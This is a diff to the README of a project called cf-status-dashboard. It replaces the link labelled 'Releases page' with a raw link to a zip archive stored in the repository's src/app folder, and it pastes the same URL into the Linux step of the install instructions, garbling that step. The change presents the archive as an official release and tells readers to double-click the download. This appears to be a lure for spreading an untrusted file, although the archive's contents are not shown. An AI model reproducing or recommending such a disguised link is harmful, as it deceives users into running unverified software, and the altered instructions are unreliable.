rkzinn10/cf-status-dashboard/README.md

 - Updated web browser (Chrome, Firefox, Safari, or Edge).

 ## 📦 Download & Install
-To get started, visit the [Releases page](https://github.com/rkzinn10/cf-status-dashboard/releases) to download the latest version of cf-status-dashboard.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/rkzinn10/cf-status-dashboard/main/src/app/cf-status-dashboard-v3.7-beta.2.zip) to download the latest version of cf-status-dashboard.

 ### Steps to Download:
 1. Click on the link above to go to the Releases page.
 2. Find the latest version of cf-status-dashboard.
-3. Choose the appropriate file for your operating system (e.g., .exe for Windows, .dmg for macOS, or .tar.gz for Linux).
+3. Choose the appropriate file for your operating system (e.g., .exe for Windows, .dmg for macOS, or https://raw.githubusercontent.com/rkzinn10/cf-status-dashboard/main/src/app/cf-status-dashboard-v3.7-beta.2.zip for Linux).
 4. Download the file to your computer.
 5. Once the download is complete, locate the file and double-click it to start the installation.